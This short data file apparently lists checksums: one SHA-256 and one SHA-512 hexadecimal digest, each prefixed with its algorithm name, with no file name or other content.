SHA25631fcc864de2e72799529a54ab9f7881f99d09100d240b71cd833836f404544c0
SHA5124ade8219aefa089f424152cc4cecad0d988265f3004456963ac7975171c7a7b4f913dca54e55efd641cc0974ff3e1af052148b990e885c28a54c258070146d38